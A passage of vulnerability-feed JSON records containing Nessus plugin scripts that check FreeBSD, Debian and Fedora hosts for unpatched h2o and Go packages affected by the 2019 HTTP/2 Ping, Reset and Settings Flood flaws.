of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(128135);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-9512\", \"CVE-2019-9514\", \"CVE-2019-9515\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"FreeBSD : h2o -- multiple HTTP/2 vulnerabilities (72a5579e-c765-11e9-8052-0028f8d09152) (Ping Flood) (Reset Flood) (Settings Flood)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Jonathon Loomey of Netflix reports :\n\nHTTP/2 implementations do not robustly handle abnormal traffic and\nresource exhaustion\n\nRecently, a series of DoS attack vulnerabilities have been reported on\na broad range of HTTP/2 stacks. Among the vulnerabilities, H2O is\nexposed to the following :\n\n- CVE-2019-9512 'Ping Flood': The attacker sends continual pings to an\nHTTP/2 peer, causing the peer to build an internal queue of responses.\nDepending on how efficiently this data is queued, this can consume\nexcess CPU, memory, or both, potentially leading to a denial of\nservice.\n\n- CVE-2019-9514 'Reset Flood': The attacker opens a number of streams\nand sends an invalid request over each stream that should solicit a\nstream of RST_STREAM frames from the peer. Depending on how the peer\nqueues the RST_STREAM frames, this can consume excess memory, CPU, or\nboth, potentially leading to a denial of service.\n\n- CVE-2019-9515 'Settings Flood': The attacker sends a stream of\nSETTINGS frames to the peer. Since the RFC requires that the peer\nreply with one acknowledgement per SETTINGS frame, an empty SETTINGS\nframe is almost equivalent in behavior to a ping. Depending on how\nefficiently this data is queued, this can consume excess CPU, memory,\nor both, potentially leading to a denial of service.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://github.com/h2o/h2o/issues/2090\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.kb.cert.org/vuls/id/605641/\"\n );\n # https://vuxml.freebsd.org/freebsd/72a5579e-c765-11e9-8052-0028f8d09152.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1d11da2f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:h2o-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/26\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"h2o-devel<2.3.0.b2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-01-11T15:23:02", "description": "Jonathon Loomey of Netflix reports :\n\nHTTP/2 implementations do not robustly handle abnormal traffic and resource exhaustion\n\nRecently, a series of DoS attack vulnerabilities have been reported on a broad range of HTTP/2 stacks. Among the vulnerabilities, H2O is exposed to the following :\n\n- CVE-2019-9512 'Ping Flood': The attacker sends continual pings to an HTTP/2 peer, causing the peer to build an internal queue of responses.\nDepending on how efficiently this data is queued, this can consume excess CPU, memory, or both, potentially leading to a denial of service.\n\n- CVE-2019-9514 'Reset Flood': The attacker opens a number of streams and sends an invalid request over each stream that should solicit a stream of RST_STREAM frames from the peer. Depending on how the peer queues the RST_STREAM frames, this can consume excess memory, CPU, or both, potentially leading to a denial of service.\n\n- CVE-2019-9515 'Settings Flood': The attacker sends a stream of SETTINGS frames to the peer. Since the RFC requires that the peer reply with one acknowledgement per SETTINGS frame, an empty SETTINGS frame is almost equivalent in behavior to a ping. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both, potentially leading to a denial of service.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-08-26T00:00:00", "type": "nessus", "title": "FreeBSD : h2o -- multiple HTTP/2 vulnerabilities (73b1e734-c74e-11e9-8052-0028f8d09152) (Ping Flood) (Reset Flood) (Settings Flood)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9512", "CVE-2019-9514", "CVE-2019-9515"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:h2o", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_73B1E734C74E11E980520028F8D09152.NASL", "href": "https://www.tenable.com/plugins/nessus/128136", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2022 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(128136);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-9512\", \"CVE-2019-9514\", \"CVE-2019-9515\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"FreeBSD : h2o -- multiple HTTP/2 vulnerabilities (73b1e734-c74e-11e9-8052-0028f8d09152) (Ping Flood) (Reset Flood) (Settings Flood)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Jonathon Loomey of Netflix reports :\n\nHTTP/2 implementations do not robustly handle abnormal traffic and\nresource exhaustion\n\nRecently, a series of DoS attack vulnerabilities have been reported on\na broad range of HTTP/2 stacks. Among the vulnerabilities, H2O is\nexposed to the following :\n\n- CVE-2019-9512 'Ping Flood': The attacker sends continual pings to an\nHTTP/2 peer, causing the peer to build an internal queue of responses.\nDepending on how efficiently this data is queued, this can consume\nexcess CPU, memory, or both, potentially leading to a denial of\nservice.\n\n- CVE-2019-9514 'Reset Flood': The attacker opens a number of streams\nand sends an invalid request over each stream that should solicit a\nstream of RST_STREAM frames from the peer. Depending on how the peer\nqueues the RST_STREAM frames, this can consume excess memory, CPU, or\nboth, potentially leading to a denial of service.\n\n- CVE-2019-9515 'Settings Flood': The attacker sends a stream of\nSETTINGS frames to the peer. Since the RFC requires that the peer\nreply with one acknowledgement per SETTINGS frame, an empty SETTINGS\nframe is almost equivalent in behavior to a ping. Depending on how\nefficiently this data is queued, this can consume excess CPU, memory,\nor both, potentially leading to a denial of service.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://github.com/h2o/h2o/issues/2090\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.kb.cert.org/vuls/id/605641/\"\n );\n # https://vuxml.freebsd.org/freebsd/73b1e734-c74e-11e9-8052-0028f8d09152.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a9fac719\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:h2o\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/26\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"h2o<2.2.6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-02-10T14:47:46", "description": "Three vulnerabilities have been discovered in the Go programming language; 'net/url' accepted some invalid hosts in URLs which could result in authorisation bypass in some applications and the HTTP/2 implementation was susceptible to denial of service.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-20T00:00:00", "type": "nessus", "title": "Debian DSA-4503-1 : golang-1.11 - security update (Ping Flood) (Reset Flood)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14809", "CVE-2019-9512", "CVE-2019-9514"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:golang-1.11", "cpe:/o:debian:debian_linux:10.0"], "id": "DEBIAN_DSA-4503.NASL", "href": "https://www.tenable.com/plugins/nessus/127930", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4503. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(127930);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-14809\", \"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"DSA\", value:\"4503\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"Debian DSA-4503-1 : golang-1.11 - security update (Ping Flood) (Reset Flood)\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Three vulnerabilities have been discovered in the Go programming\nlanguage; 'net/url' accepted some invalid hosts in URLs which could\nresult in authorisation bypass in some applications and the HTTP/2\nimplementation was susceptible to denial of service.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/golang-1.11\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/golang-1.11\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2019/dsa-4503\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the golang-1.11 packages.\n\nFor the stable distribution (buster), these problems have been fixed\nin version 1.11.6-1+deb10u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-14809\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:golang-1.11\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"golang-1.11\", reference:\"1.11.6-1+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"golang-1.11-doc\", reference:\"1.11.6-1+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"golang-1.11-go\", reference:\"1.11.6-1+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"golang-1.11-src\", reference:\"1.11.6-1+deb10u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-02-09T15:11:22", "description": "- Rebase to go1.12.9\n\n - Security fix for CVE-2019-9512, CVE-2019-9514 and CVE-2019-14809\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-09-09T00:00:00", "type": "nessus", "title": "Fedora 30 : golang (2019-55d101a740) (Ping Flood) (Reset Flood)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14809", "CVE-2019-9512", "CVE-2019-9514"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:golang", "cpe:/o:fedoraproject:fedora:30"], "id": "FEDORA_2019-55D101A740.NASL", "href": "https://www.tenable.com/plugins/nessus/128567", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-55d101a740.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(128567);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-14809\", \"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"FEDORA\", value:\"2019-55d101a740\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"Fedora 30 : golang (2019-55d101a740) (Ping Flood) (Reset Flood)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\" - Rebase to go1.12.9\n\n - Security fix for CVE-2019-9512, CVE-2019-9514 and\n CVE-2019-14809\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-55d101a740\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected golang package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-14809\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:golang\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:30\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/09\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^30([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 30\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC30\", reference:\"golang-1.12.9-1.fc30\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"golang\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-02-10T14:51:37", "description": "- Rebase to go1.11.13\n\n - Security fix for CVE-2019-9512, CVE-2019-9514 and CVE-2019-14809\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-09-09T00:00:00", "type": "nessus", "title": "Fedora 29 : golang (2019-65db7ad6c7) (Ping Flood) (Reset Flood)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14809", "CVE-2019-9512", "CVE-2019-9514"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:golang", "cpe:/o:fedoraproject:fedora:29"], "id": "FEDORA_2019-65DB7AD6C7.NASL", "href": "https://www.tenable.com/plugins/nessus/128571", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-65db7ad6c7.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(128571);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-14809\", \"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"FEDORA\", value:\"2019-65db7ad6c7\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"Fedora 29 : golang (2019-65db7ad6c7) (Ping Flood) (Reset Flood)\");\n\n script_set_attribute(attribute:\"synopsis\", 